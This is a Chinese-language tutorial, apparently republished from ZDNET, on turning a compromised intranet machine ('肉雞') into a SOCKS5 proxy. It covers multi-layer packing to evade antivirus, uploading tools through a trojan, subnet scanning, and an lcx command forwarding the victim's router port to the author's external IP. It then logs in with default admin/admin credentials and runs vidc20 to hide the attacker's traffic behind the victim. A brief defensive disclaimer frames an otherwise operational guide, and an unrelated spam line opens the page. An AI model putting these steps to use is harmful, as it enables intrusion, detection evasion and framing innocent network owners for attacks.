自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何將內網(wǎng)肉雞作成Socks5服務器

安全 黑客攻防
本文通過lcx這款反向連接的內往端口映射工具,將內網(wǎng)中的肉雞制作成Socks5服務器,旨在提醒網(wǎng)絡安全管理員這種Socks5服務器可能被入侵者當作跳板使用。

內網(wǎng)中將肉雞制作成SOCKS5服務器有人說并不可能,即便成功也無法利用。本篇文章就嘗試通過內網(wǎng)制作Socks5服務器,黑客技術只是作為一種技術存在,希望廣大的安全管理員可以通過黑客技術來加強自己在企業(yè)防護中的安全防范技術。不要將黑客技術用于破壞的途徑上。

首先介紹一下使用的工具,lcx.exe 這是一個反向連接的內網(wǎng)端口映射工具,VIDC20.exe也是一個端口映射工具,不過它也有代理服務器的功能,支持http/socks4/socks5代理,支持代理驗證,支持udp代理,支持二級代理;還有S掃描器,這個只有一個可執(zhí)行文件,小巧方便,掃端口最合適了。這些工具在網(wǎng)上都有下載,在作代理服務之前,我們需要先作一下免殺,因為大部分殺毒軟件是殺lcx.exe和S掃描器的,如果不作免殺,那一上傳就可能被殺毒軟件給殺掉

像這種強悍的卡巴,在命令行下是沒有辦法中止的,所以只能作免殺了,其他的殺毒軟件在命令行下可以中止,不過需要一些技巧,因為它們都有線程保護,用常規(guī)的方法是中止不了的。我曾經(jīng)在命令行下干掉過瑞星,只是方法比較繁瑣,所以就不在這里演示了。至于免殺方法嘛,只要簡單的加下殼就可以過關了,據(jù)我實驗,先加個北斗3.5,再加aspack 2.12,之后再加北斗3.5,這樣處理后絕大部分殺軟件就不殺這兩個程序了,呵呵。簡單吧,殺毒軟件也是會區(qū)別對待的,如果是一些流行木馬,加這三重殼是不能免殺的,對于一些不太重要的黑客工具,殺毒軟件就會顯得相對寬松的多了。我們就是鉆的殺毒軟件的這個空子,如果是加了三重殼也過不了殺毒軟件,那就不要怕麻煩將它們的特征碼給修改掉,就可以過殺毒軟件了,修改的方法網(wǎng)上有許多動畫,大家可以自己找找,我的PCSHARE馬就是這樣作的,過卡巴,瑞星、江民、瑞星、金山、諾頓、趨勢等殺毒軟件很輕松,也可以輕松過各種查馬工具,這就是我修改特征碼后加了三重殼作成的,一個超強的工具。呵呵。有些跑題了,言歸正傳。

工具準備完備后,下面開始作代理了。首先打開你的木馬客戶端程序,將上面的這些工具上傳到內網(wǎng)中的肉雞上,就放在WINDOWS目錄里吧,文件名嘛,最好改一下,免得引起對方注意。打開對方的命令符,鍵入命令:ipconfig /all查看一下肉雞的IP地址,如:192.168.0.2,得到這個本機及網(wǎng)關的IP地址以后,我們就可以用S掃描器對同它同一網(wǎng)段的IP地址進行掃描,看這臺肉雞的網(wǎng)關是什么類型的。S掃描器相信大家都會用了吧。

命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20

這個s-jk是我加三重殼免殺后的S掃描器,這條命令在整個網(wǎng)段中掃描開放139 3389 1433 80 23端口的主機,呵呵,這是為滲透內部網(wǎng)絡作準備,也許有很重要的信息出現(xiàn)呢。

經(jīng)過掃描發(fā)現(xiàn)這臺肉雞的網(wǎng)關開放80號端口,這說明這臺網(wǎng)關一定是臺路由器。那怎樣登錄進它的路由器呢?大家都知道寬帶路由器在外網(wǎng)中是不能登錄的,只能由它的內部網(wǎng)絡登錄,難道要進肉雞的屏幕控制,用肉雞的IE登錄?非也,這樣很容易暴露,再說肉雞上的管理員也許現(xiàn)在正在電腦前工作,你是根本沒有辦法進行控制的,下面在自己的電腦上打開命令提示符,命令:lcx -listen 21 8000 再回到肉雞的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解釋一下:218.57.179.152是我的外網(wǎng)IP,這樣就將肉雞的寬帶路由器的80端口映射到了我的電腦的21端上了,我連接本機的8000端口就可以了。

下一步就要打開IE,地址欄中鍵入:http://127.0.0.1:8000回車后,盼望已久的并且很熟悉的登錄界面出現(xiàn)了。這正是寬帶路由器的登錄界面,只不過這不是我的寬帶路由器,而是另一個局域網(wǎng)的寬帶路由器,我熟練的鍵入的默認用戶名及密碼,admin admin,確定后成功登錄了。

接下來的工作簡直就是輕車熟路了,設置一個虛擬服務器指向這臺肉雞,端口設置成了個陌生的端口,不要設置成8080,因為寬帶路由器要使用這個端口,它是不允許設置成這個端口的,我設置的是2233,保存后,我們再回到肉雞的命令行下,命令:vidc20 -d -p 2233 這個命令的意思就是以控制臺的方式啟動vidc20.exe這個程序,開2233服務端口提供代理服務。這臺肉雞已經(jīng)開始提供SOCK5服務了,并且路由器上的映射也已經(jīng)正常工作,我們要作的就是打開SOCK5客戶端程序,設置一下SOCKS5服務器的IP地址及端口,也就是這臺肉雞的外網(wǎng)IP。我們將IE的圖標拖到SocksCap32的圖標上創(chuàng)建了一個新快捷方式,這樣以后我們登錄到ASP馬時就可以雙擊SocksCap32中的IE進行登錄了。如果你覺得不放心,可以登錄www.123cha.com,查看一下IP,IP地址顯示的是你的肉雞的IP,使用這種代理比使用匿名的HTTP代理還要安全的多,因為給你提供代理的是臺個人電腦,并且IP不固定,在一個局域網(wǎng)內部,沒有一些監(jiān)控軟件記錄任何的連接,并且這臺個人電腦重啟后vidc20.exe并不在運行,可以說是毫無痕跡,這樣即使有人追查你的話,也只能查到你肉雞的IP為止,再想繼續(xù)追查就不太容易了。

有人說如果管理員把寬帶路由器的密碼改掉了,那不是沒得玩了,我隨機挑選了五個局域網(wǎng)進行測試,全部是默認口令,看來設置默認口令的概率還是滿高的。我分析了一下原因:一、可能是寬帶路由器只能由內網(wǎng)連接,管理員對其安全性認識不足。二、內網(wǎng)中的電腦用戶都是菜鳥,不需要作安全設置。三、管理員懈怠,沒把它當回事。說實話我的寬帶路由器也是設置的默認口令,為什么沒有改掉呢?我覺得我應該屬于第二種情況吧,內網(wǎng)中全部是菜鳥用戶,所以根本必要修改掉,這樣就暴露了一個安全問題,一旦內網(wǎng)中的電腦中了木馬,入侵者就有可能獲得你的寬帶帳號,用你的寬帶帳號刷Q幣、刷業(yè)務;還可能登錄你的ISP將你的寬帶帳號給修改掉,讓你上不了網(wǎng)了。如果入侵者拿你作跳板,他作了壞事由你背黑鍋,那豈不是更加冤枉。所以,大家一定對內網(wǎng)的安全問題提高警惕。該打的補丁打上,該修改的默認口令給修改掉,這樣就可以抵御大多數(shù)初級的入侵者的攻擊了。但要想絕對安全,那是不可能的,這個世界上沒有絕對的安全。
 

【編輯推薦】

  1. 黑客不愛軟件漏洞 更喜歡利用錯誤配置
  2. “90后”黑客攻擊南京房管局網(wǎng)站
  3. Black Hat和Defcon黑客大會的五大看點
  4. 路由器漏洞:黑客展示如何攻陷百萬臺
  5. 揭秘黑客手中DDoS攻擊利器——黑色能量2代
責任編輯:張啟峰 來源: ZDNET
相關推薦

2009-02-27 14:12:00

socks5代理服務器服務器

2023-11-01 07:14:55

2023-05-05 08:40:16

2012-10-29 09:27:16

2015-03-20 13:40:17

2020-05-25 07:00:58

Raspberry PWeb服務器

2012-11-12 14:22:17

Windows Ser

2010-09-26 09:41:11

2015-07-07 11:12:48

2019-05-17 09:25:14

肉雞服務器攻擊

2011-08-09 14:27:16

WindowsServ服務器ADDS

2014-09-26 09:23:08

FacebookInstagramAWS

2011-09-06 15:38:50

UbuntuUbuntu Serv

2011-09-07 09:30:57

服務器虛擬機

2017-06-14 17:02:27

服務器F5滲透

2018-08-21 10:35:18

NginxWeb服務器

2018-12-13 10:16:20

NginxWeb服務器

2012-11-23 17:20:43

Linux服務器

2019-03-20 09:00:00

MySQL數(shù)據(jù)庫轉移數(shù)據(jù)庫

2013-09-04 10:15:56

點贊
收藏

51CTO技術棧公眾號